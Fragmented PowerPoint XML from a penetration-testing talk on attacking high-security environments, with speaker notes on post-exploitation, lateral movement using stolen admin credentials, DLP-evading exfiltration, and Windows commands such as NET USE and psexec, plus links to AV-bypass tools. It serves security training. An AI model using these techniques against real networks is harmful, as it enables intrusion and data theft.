          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="547465" y="795690"/>
              </a:moveTo>
              <a:arcTo wR="2276551" hR="2276551" stAng="13234688" swAng="12124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5B85A-6C39-4873-BD39-5D7F292F1B27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42FCC-A067-4519-AA19-899798722B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3556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OMFG Hilarious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6511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7990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8587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joe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1344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9204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0161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joe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6869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joe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8148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Chris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“there is no spoon” moment, where we talk about how pivoting,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> persistence, and post exploitation are just parts of the normal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1A1B-294F-4407-9E2D-4F9B7A747BD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 into a host, determine what’s there, collect, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> wash rinse repeat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3656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810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 with all those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> devices is that most people rely on these devices to let them know something is wrong. No alert…nothing is wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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830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joe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7483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943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943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943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9435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943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9834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11961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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does this work, or something better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> required to get into your org?  Worked for RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0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04365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this work, or something better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> required?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0436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8300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sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> was owned and we were using his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. Would you notice? Would you know it was him or not?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Work the  hard stuff until its easy stuff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53614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is using windows tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to move</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> around and find stuff. But also use custom tools to find stuff.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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> search string stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenDLP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psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> set EXE::Custom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Operator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Attacker (look at it on target,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exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> then hand off to analyst)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09817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Joeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (ADFIND)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (ADADD)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nirsoft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SecurityXploded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backdoored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DIR \\system\c$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TASKLIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /S system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NET USE \\system /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>user:DOMAIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>\user  password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59841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browsing shares, and copying files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> once you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>creds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53666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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over TFTP/FTP/HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Do people still do that??  Guess so, ask RSA…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over encrypted protocol (HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Take that DLP!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28553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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From “The Getaway” from Sean Coyne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81671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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mention some crazy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> set up separating clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan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81671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some crazy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> set up separating clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vlan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81671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“The Getaway” from Sean Coyne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over TFTP/FTP/HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Do people still do that??  Guess so, ask RSA…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over encrypted protocol (HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Take that DLP!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81671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“The Getaway” from Sean Coyne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over TFTP/FTP/HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Do people still do that??  Guess so, ask RSA…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over encrypted protocol (HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Take that DLP!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8167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33864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“The Getaway” from Sean Coyne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over TFTP/FTP/HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Do people still do that??  Guess so, ask RSA…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> over encrypted protocol (HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Take that DLP!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81671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80861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74811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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read threat modeling section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ptes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These work better with the presence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> don’t work so well with non-exploitable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns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Webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> example…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cant tell you that you have a failure of policy if I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>havent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> read it, or seen it…I cant make assumptions about your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>enviroment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> via a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>…that gives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The client ammo to shoot back or shoot you down.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Bottom line, do a risk assessment.  Not as sexy as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but finds, fixes, suggests actually policy.  No policy == No security program!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64767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974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772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9955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1278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7641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joe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2FCC-A067-4519-AA19-899798722BC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9527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A8D69-10AD-47FE-B30B-044CBA43455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69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C5975-E08F-4E69-A642-FA5316A7DB7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80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6B778-1AB3-4A3E-B551-9C12FB91DDC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942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eader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footer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94450"/>
            <a:ext cx="9144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0" y="6256338"/>
            <a:ext cx="9144000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808080"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" smtClean="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9" descr="footer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94450"/>
            <a:ext cx="9144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6256338"/>
            <a:ext cx="9144000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808080"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" smtClean="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7" descr="header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eader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footer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94450"/>
            <a:ext cx="9144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6256338"/>
            <a:ext cx="9144000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808080"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" smtClean="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9CB797-6492-4F6A-A61A-464C3FB440CA}" type="datetime1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5/11/2012</a:t>
            </a:fld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8414E-967C-473E-8BD2-1AFBB3B708E1}" type="slidenum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 sz="2400">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0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–"/>
              <a:tabLst/>
              <a:defRPr sz="2000">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0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 sz="1800">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0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–"/>
              <a:tabLst/>
              <a:defRPr sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0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»"/>
              <a:tabLst/>
              <a:defRPr sz="1600">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/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DB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DB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Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3429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DB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Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="3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DB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Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="4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DB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Fifth level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85800" y="277368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defRPr sz="3200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833115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24491-A5A7-436D-B1F3-A0897D59F19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0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0D562-4580-42E9-88BA-E7590737AD1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97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E03DA-9829-4A6E-A164-FD4F44F73AC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35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8B5D3-E1EF-4D46-8D20-55822852663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92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989DB-6568-4B9C-8BA6-FA3AE8CB9B1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13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A2AEA-111A-4799-8CC6-BCA993E9380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69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54269-C390-4C7C-866B-0309CA9196F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00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A696F-4F75-412B-AA38-327BD46649F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70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6130F2-76AF-4CE3-B9C5-E60F1FEEA362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24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header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9" descr="footer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394450"/>
            <a:ext cx="9144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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6256338"/>
            <a:ext cx="9144000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808080"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" smtClean="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trategicsec.com/msf_executables-password-is-msf.rar" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://strategicsec.com/avbypass.zip" TargetMode="Externa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foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.usatoday.com/news/nation/2007-07-20-saic-security_N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gizmodo.com/5820049/anonymous-leaks-90000-military-email-accounts-in-latest-antisec-attack" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://threatpost.com/en_us/blogs/report-l3-warns-employees-attacks-using-compromised-securid-tokens-060111" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/news/view/19242/March-RSA-Hack-Hits-Lockheed-Remote-Systems-Breached.html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cafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Operation_Aurora" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/news/view/19619/Governments-IOC-And-UN-Hit-By-Massive-Cyber-Attack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bbc.co.uk/news/world-us-canada-13635912" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bankinfosecurity.eu/articles.php?art_id=3724" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gsnmagazine.com/node/23578" TargetMode="External"/><Relationship Id="rId9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zallen.com/insights/expertvoices/advanced-persistent-threat?pg=all" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.advanced-persistent-threat.com/" TargetMode="Externa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rnal0wnage.attackresearch.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lares.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://twitter.com/carnal0wnage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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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28600" y="1066800"/>
            <a:ext cx="8686800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Big Bang Theory...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Evolution of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> High Security Environments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="04668D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57400" y="5334000"/>
            <a:ext cx="533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Clr>
                <a:srgbClr val="0000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99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presented By: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0000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99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Joe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>McCray &amp; Chris Gates</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0000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rgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0000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>
              <a:solidFill>
                <a:srgbClr val="3333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133600"/>
            <a:ext cx="6400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451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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1371600"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get your exploit code... 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/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0"/>
            <a:ext cx="4343400" cy="434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286000"/>
            <a:ext cx="4343400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45170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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1371600"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Own the boxes and take screen-shots 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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066925"/>
            <a:ext cx="4114800" cy="3419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338" y="3200400"/>
            <a:ext cx="3802062" cy="329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5213" y="2286000"/>
            <a:ext cx="3811587" cy="401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6750" y="3886200"/>
            <a:ext cx="5480050" cy="270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45170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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1371600"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write The Report... 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill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057400"/>
            <a:ext cx="6172200" cy="44857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45170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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1371600"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
